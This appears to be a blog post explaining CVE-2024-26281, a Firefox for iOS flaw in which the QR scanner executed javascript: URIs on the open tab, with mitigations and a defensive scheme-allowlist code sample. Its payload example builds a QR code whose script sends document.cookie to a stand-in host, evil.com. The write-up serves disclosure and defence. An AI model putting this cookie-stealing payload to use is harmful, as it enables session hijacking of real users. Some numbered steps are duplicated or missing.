In early 2024, a critical security flaw—CVE-2024-26281—was uncovered in Firefox for iOS versions below 123. This bug allowed attackers to inject and run malicious JavaScript on a user's currently-open website simply by scanning a specially crafted QR code with the browser’s built-in QR code scanner.
This post breaks down the vulnerability, how it works, includes code examples, and covers exploit details in plain language.
The Issue in a Nutshell
Let’s say you use Firefox for iOS. If you scan a QR code with a JavaScript-based URI (like javascript:alert(document.domain)), this flaw could make your browser execute the code in the context of whatever site you already had open. Normally, browsers try to stop this for security. But this bug bypassed that protection—allowing full script execution, leading to things like cookie theft, phishing, and other attacks.
Technical Details
When you scan a QR code, Firefox for iOS should validate any links before opening them, especially if they’re JavaScript URIs. The browser was supposed to prevent javascript: schemes from running unless strictly necessary.
But in versions before 123, the QR code scanner would take any URL—even one starting with javascript:—and let it execute in the context of the current open tab. No checks, no warnings.
2. Victim scans the QR code using Firefox for iOS’ QR code scanner.
3. Browser runs the script—not in a blank page, but on whatever site the user had open. If you were signed into sensitive sites (bank, email), the script could access your session.
Here’s how attackers might generate a payload QR code:
// Example QR code payload
const maliciousUri = "javascript:fetch('https://evil.com/steal?cookie='+document.cookie)";
// Use any online tool or library like qrcode.js to create the QR code:
QRCode.toDataURL(maliciousUri, function (err, url) {
  console.log(url); // This is the QR code, ready to print or display
});
3. Victim uses the Firefox QR code scanner (not just the camera app) to scan the malicious QR code.
4. Script executes in the open tab’s context, stealing cookies, taking screenshots, or changing content.
Proof-of-Concept Demo
This is an exclusive simple proof-of-concept. Do not use this for anything illegal or on anyone but yourself.
1. Visit https://www.qr-code-generator.com/ (external site).
- Update your Firefox for iOS to version 123 or later.
- Don’t scan QR codes from untrusted sources.
- Browser makers: Always strip or strictly validate potentially dangerous URI schemes in QR code handlers and URL parsers.
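As an added example (not Mozilla's actual fix and not code from Firefox for iOS), the code below shows the scheme validation recommended above for text decoded from a QR code: parse first, then allow only an explicit set of schemes. The function names, the http/https allowlist and the sample strings are assumptions made for illustration; the naive prefix check is included to show why a literal denylist is not enough.

```javascript
// Added example: scheme validation for text decoded from a QR code.
// Names and the allowlist are assumptions, not Firefox for iOS code.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Weak check, shown for contrast: a literal prefix denylist.
function naiveIsSafe(text) {
  return !text.startsWith("javascript:");
}

// Hardened check: parse first, then allow only known-safe schemes.
function classifyScannedText(text) {
  let url;
  try {
    // The WHATWG URL parser trims surrounding whitespace, drops embedded
    // tabs/newlines and lowercases the scheme, so the check sees the
    // normalized scheme rather than the raw string.
    url = new URL(text);
  } catch {
    // Not an absolute URL: treat it as plain text, never as something to load.
    return { action: "search", query: text.trim() };
  }
  if (ALLOWED_SCHEMES.has(url.protocol)) {
    return { action: "navigate", url: url.href };
  }
  // javascript:, data:, file:, custom app schemes, ... are all refused.
  return { action: "block", scheme: url.protocol };
}

// Constructed sample inputs (not taken from a real incident).
const SAMPLES = [
  "https://example.com/login",
  "javascript:alert(document.domain)",
  "  JavaScript:alert(document.domain)",
  "java\tscript:alert(document.domain)",
  "data:text/html,hi",
  "coffee shop wifi",
];

function runSamples() {
  return SAMPLES.map((text) => ({
    text,
    naive: naiveIsSafe(text) ? "allowed" : "refused",
    hardened: classifyScannedText(text).action,
  }));
}

console.table(runSamples());
```

The third and fourth samples pass the prefix denylist but are blocked once the scheme is read from the parsed URL.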
Final Thoughts
CVE-2024-26281 shows even simple features like a QR code scanner can open the door to powerful attacks if not properly sandboxed. If you’re a developer, always treat all user inputs as potentially dangerous—especially when they have access to “execute code” features.
Update your apps regularly, and stay safe out there!
Timeline
Published on: 02/22/2024 15:15:08 UTC
Last modified on: 11/20/2024 17:35:24 UTC